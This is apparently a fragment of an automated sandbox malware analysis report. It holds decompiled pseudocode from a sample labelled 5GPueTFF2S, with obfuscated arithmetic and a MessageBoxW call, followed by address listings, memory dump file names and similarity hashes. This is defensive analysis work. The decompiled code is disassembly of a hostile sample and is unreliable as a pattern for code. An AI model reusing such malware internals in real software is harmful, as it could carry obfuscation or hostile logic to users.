				_t98 = E00ECEE50(( *(_t212 - 0x18) & 0x0000ffff) + ( *(_t212 - 0xc) & 0x000000ff) + 1,  *(_t212 - 0xc), _t181 +  *0x1000cc0, _t181);
				asm("sbb edx, edi");
				 *0x1000c83 = 1;
				if((_t98 - _t210 | _t181) != 0) {
					 *0x1000c83 = 0;
				}
				if( *0x1000c84 == 0) {
					 *((short*)(_t212 - 0x24)) = 0x83;
					asm("cdq");
					 *0x1000cc8 = ( *(_t212 - 0x18) & 0x0000ffff) + 0xf;
					_t108 =  *0x1000cd0; // 0x0
					 *0x1000ccc = _t181;
					 *((char*)(_t212 - 5)) =  *((intOrPtr*)(_t212 - 3)) +  *((intOrPtr*)(_t212 - 0x28)) + (_t108 & 0x000000e4) - M01000CB0 +  *0x1000cb8 - 0x2d;
					asm("cdq");
					 *((intOrPtr*)(_t212 - 0xa0)) =  *((intOrPtr*)(_t212 - 0xa0)) -  *0x1000cd0 - 0x3811;
					asm("sbb [ebp-0x9c], edx");
				}
				_t69 = _t212 - 0x160; // 0x60f1ba1c
				_t182 = _t69;
				_t70 = _t212 - 0x1ac; // 0x60f1b9d0
				_t101 = _t70;
				MessageBoxW(GetForegroundWindow(), _t101, _t182, 0x10);
				return 0;
			}




































                                              0x00ec6dd0
                                              0x00ec6dd0
                                              0x00ec6dd1
                                              0x00ec6dd7
                                              0x00ec6e5d
                                              0x00ec6e65
                                              0x00ec6e69
                                              0x00000000
                                              0x00000000
                                              0x00ec6c60
                                              0x00ec6c63
                                              0x00ec6c69
                                              0x00ec6c74
                                              0x00ec6ca8
                                              0x00ec6cae
                                              0x00ec6cb1
                                              0x00ec6cb4
                                              0x00ec6cd5
                                              0x00ec6ce9
                                              0x00ec6cf7
                                              0x00ec6cfd
                                              0x00ec6d05
                                              0x00ec6d0b
                                              0x00ec6d13
                                              0x00ec6d19
                                              0x00ec6d1d
                                              0x00ec6d1f
                                              0x00ec6d24
                                              0x00ec6d27
                                              0x00ec6d2e
                                              0x00ec6d2f
                                              0x00ec6d30
                                              0x00ec6d34
                                              0x00ec6d35
                                              0x00ec6d3b
                                              0x00ec6d40
                                              0x00ec6d4d
                                              0x00ec6d50
                                              0x00ec6d5e
                                              0x00ec6d64
                                              0x00ec6d66
                                              0x00ec6d6d
                                              0x00ec6d6e
                                              0x00ec6d71
                                              0x00ec6d73
                                              0x00ec6d75
                                              0x00ec6d75
                                              0x00ec6d1f
                                              0x00ec6c76
                                              0x00ec6c7d
                                              0x00ec6c83
                                              0x00ec6c86
                                              0x00ec6c8d
                                              0x00ec6c98
                                              0x00ec6c9d
                                              0x00ec6c9d
                                              0x00ec6c74
                                              0x00ec6da2
                                              0x00ec6e6f
                                              0x00ec6e7d
                                              0x00ec6e87
                                              0x00ec6e8d
                                              0x00ec6e94
                                              0x00ec6e9d
                                              0x00ec6ea2
                                              0x00ec6ea9
                                              0x00ec6eab
                                              0x00ec6f65
                                              0x00ec6f6d
                                              0x00ec6f76
                                              0x00ec6f6f
                                              0x00ec6f6f
                                              0x00ec6f6f
                                              0x00ec6f82
                                              0x00ec6eb1
                                              0x00ec6eb4
                                              0x00ec6ebd
                                              0x00ec6ed4
                                              0x00ec6ef3
                                              0x00ec6efa
                                              0x00ec6f03
                                              0x00ec6f09
                                              0x00ec6f0c
                                              0x00ec6f22
                                              0x00ec6f23
                                              0x00ec6f26
                                              0x00ec6f26
                                              0x00ec6f2b
                                              0x00ec6f36
                                              0x00ec6f37
                                              0x00ec6f4a
                                              0x00ec6f56
                                              0x00ec6f59
                                              0x00ec6f59
                                              0x00ec6eb4
                                              0x00ec6fa9
                                              0x00ec6fb0
                                              0x00ec6fb5
                                              0x00ec6fb5
                                              0x00ec6fb8
                                              0x00ec6fb9
                                              0x00ec6fd4
                                              0x00ec6fd6
                                              0x00ec6fdc
                                              0x00ec6fe3
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6fde
                                              0x00ec6ff6
                                              0x00ec6ff9
                                              0x00ec7002
                                              0x00ec7009
                                              0x00ec7013
                                              0x00ec701a
                                              0x00ec701e
                                              0x00ec7025
                                              0x00ec7027
                                              0x00ec7027
                                              0x00ec7035
                                              0x00ec703c
                                              0x00ec704a
                                              0x00ec704b
                                              0x00ec7050
                                              0x00ec705d
                                              0x00ec7081
                                              0x00ec7084
                                              0x00ec7085
                                              0x00ec708b
                                              0x00ec708b
                                              0x00ec7091
                                              0x00ec7091
                                              0x00ec7097
                                              0x00ec7097
                                              0x00ec7872
                                              0x00ec7880

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.423883840.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                              • Associated: 00000000.00000002.423879545.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424170838.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424177261.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424207782.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ec0000_5GPueTFF2S.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RPSQ8~
                                              • API String ID: 0-3092587937
                                              • Opcode ID: ebb6faed0b2cf89296c5b33968f6db43529a56c7c787f83294b9005eecb710f5
                                              • Instruction ID: e50b66be2258243ac86c1a1d79969e9a020490e848b9b145b5aaecf2e1a4d679
                                              • Opcode Fuzzy Hash: ebb6faed0b2cf89296c5b33968f6db43529a56c7c787f83294b9005eecb710f5
                                              • Instruction Fuzzy Hash: 7A51C4759042998ACB29CF74D945FFDBBF6FB59300F14906AE4C4E7349DA3A8942CB10
                                              Uniqueness

                                              Uniqueness Score: -1.00%